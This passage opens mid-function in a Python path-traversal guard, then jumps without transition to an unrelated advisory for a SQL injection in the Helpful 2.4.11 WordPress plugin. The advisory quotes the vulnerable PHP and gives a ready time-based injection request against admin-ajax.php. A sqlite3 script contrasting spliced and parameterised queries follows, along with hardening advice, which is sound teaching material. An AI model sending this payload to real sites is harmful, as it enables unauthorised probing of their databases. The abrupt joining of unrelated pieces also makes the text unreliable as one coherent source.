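    name = fully_decode(requested)
    if "\x00" in name or "\\" in name:
        raise TraversalError("NUL byte or backslash in requested path")
    # Path joining replaces `base` entirely when `name` is absolute, and resolve()
    # collapses every ../, so the containment test below is the one that matters.
    target = (base / name).resolve()
    if target != base and base not in target.parents:
        raise TraversalError(f"{requested!r} escapes {base}")
    if allowed_suffixes and target.suffix.lower() not in allowed_suffixes:
        raise TraversalError(f"{target.name!r} is not a permitted file type")
    return target


def is_allowed(base_dir: str, requested: str, allowed_suffixes=(".log",)) -> bool:
    """Boolean form of safe_resolve for callers that only need a yes/no."""
    try:
        safe_resolve(base_dir, requested, allowed_suffixes)
        return True
    except TraversalError:
        return False
```

The order matters: decode first, then resolve, then compare, and only then open the file; a check that looks for the literal string "../" before decoding, or that compares unresolved paths, can be sidestepped by encoding or by a symlink under the base directory.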
            
Title: Helpful 2.4.11 SQL Injection - WordPress Plugin
Version : 2.4.11
Software Link : https://wordpress.org/plugins/helpful/
Date of found: 10.04.2019
Author: Numan Türle


core/Core.class.php
// Ajax requests: pro
add_action( 'wp_ajax_helpful_ajax_pro', array( $this, 'helpful_ajax_pro' ) );

// set args for insert command
$args = array(
    'post_id' => $_REQUEST['post_id'],
    'user'    => $_REQUEST['user'],
    'pro'     => $_REQUEST['pro'],
    'contra'  => $_REQUEST['contra']
);
$result = $this->insert( $args );

@params = 'post_id' => $_REQUEST['post_id'],
call function insert -->

if( !$args['post_id'] ) return false;
$check = $wpdb->get_results("SELECT post_id,user FROM $table_name WHERE user = '$user' AND post_id = $post_id");



Payload :
GET /wp-admin/admin-ajax.php?action=helpful_ajax_pro&contra=0&post_id=if(1=1,sleep(10),0)&pro=1&user=1
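
The query quoted above interpolates $post_id straight into the SQL text, so anything the request carries in post_id becomes part of the statement. The sqlite3 script below, an added example and not the plugin's code, puts the plugin's query pattern next to the hardened form: an integer check on post_id and bound parameters for both values. make_db, lookup_vulnerable, lookup_safe and safe_rejects are my names; the table and rows are constructed.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the plugin's table, with three votes from two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE helpful (post_id INTEGER, user TEXT, pro INTEGER, contra INTEGER)")
    conn.executemany("INSERT INTO helpful VALUES (?, ?, ?, ?)",
                     [(1, "1", 1, 0), (2, "1", 0, 1), (3, "2", 1, 0)])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user: str, post_id: str) -> list:
    """Mirrors the plugin's query: request values spliced into the SQL text, so
    post_id='1 OR 1=1' rewrites the WHERE clause and returns every row."""
    sql = f"SELECT post_id,user FROM helpful WHERE user = '{user}' AND post_id = {post_id}"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, user: str, post_id: str) -> list:
    """Hardened version: post_id must parse as an integer, and both values travel as
    bound parameters, so they can only ever be compared, never parsed as SQL."""
    try:
        pid = int(post_id)
    except (TypeError, ValueError):
        raise ValueError(f"post_id must be an integer, got {post_id!r}")
    return conn.execute(
        "SELECT post_id,user FROM helpful WHERE user = ? AND post_id = ?", (user, pid)
    ).fetchall()


def safe_rejects(conn: sqlite3.Connection, user: str, post_id: str) -> bool:
    """True when the hardened lookup refuses the input."""
    try:
        lookup_safe(conn, user, post_id)
        return False
    except ValueError:
        return True
```

On the WordPress side the equivalent is $wpdb->prepare() with %d for post_id and %s for user (and a cast of post_id to int before use), which is what makes a time-based probe like the if(1=1,sleep(10),0) payload above turn into a failed integer conversion instead of a query.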